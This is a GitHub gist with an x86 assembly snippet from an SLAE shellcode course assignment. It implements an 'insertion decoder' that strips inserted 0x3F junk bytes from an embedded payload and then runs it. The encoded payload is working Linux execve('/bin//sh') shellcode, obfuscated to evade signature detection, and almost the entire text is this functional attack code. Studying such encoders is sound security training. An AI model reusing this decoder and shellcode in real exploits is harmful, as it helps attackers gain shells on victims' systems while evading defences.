Last active
May 26, 2018 23:03
-
-
Save geyslan/5373202 to your computer and use it in GitHub Desktop.
Insertion Decoder - forlife
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/4th.assignment/insertion_decoder.asm | |
| global _start | |
| section .text | |
| _start: | |
| jmp getaddress | |
| mainflow: | |
| pop esi ; extract the address of the shellcode from stack | |
| lea edi, [esi] ; load the shellcode address in edi to use in loop | |
| xor ecx, ecx ; zero the counter | |
| decoder: | |
| mov ebx, dword [esi + ecx] ; copy the two next bytes to ebx | |
| inc ecx ; let's read the next byte in the next loop | |
| cmp bx, 0xF1F1 ; compares with the signature in the shellcode's end | |
| je short execve ; is shellcode's end? if yes, run it | |
| cmp bl, 0x3F ; compares with the garbage byte (0x3F) AAS instruction | |
| ; 3F is the least used opcode as analyzed here http://z0mbie.host.sk/opcodes.html (I know that it's a PE) | |
| je short decoder ; is an inserted garbage byte? if yes continue looping and trying to find a good one | |
| mov byte [edi], bl ; when isn't garbage, copy the byte to the correct address | |
| inc edi ; let's to set the next byte of the shellcode | |
| jmp short decoder ; continue decoding | |
| getaddress: | |
| call mainflow ; call back just to get the eip (address of the coded execve below) | |
| execve: db 0x3F, 0x3F, 0x3F, 0x31, 0x3F, 0xc9, 0x3F, 0xf7, 0xe1, 0x3F | |
| db 0xb0, 0x0b, 0x3F, 0x51, 0x68, 0x3F, 0x2f, 0x2f, 0x3F, 0x73 | |
| db 0x68, 0x3F, 0x68, 0x2f, 0x3F, 0x62, 0x69, 0x3F, 0x6e, 0x89 | |
| db 0x3F, 0xe3, 0xcd, 0x3F, 0x80 | |
| db 0xF1, 0xF1 ; the two last bytes are the stop signature |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment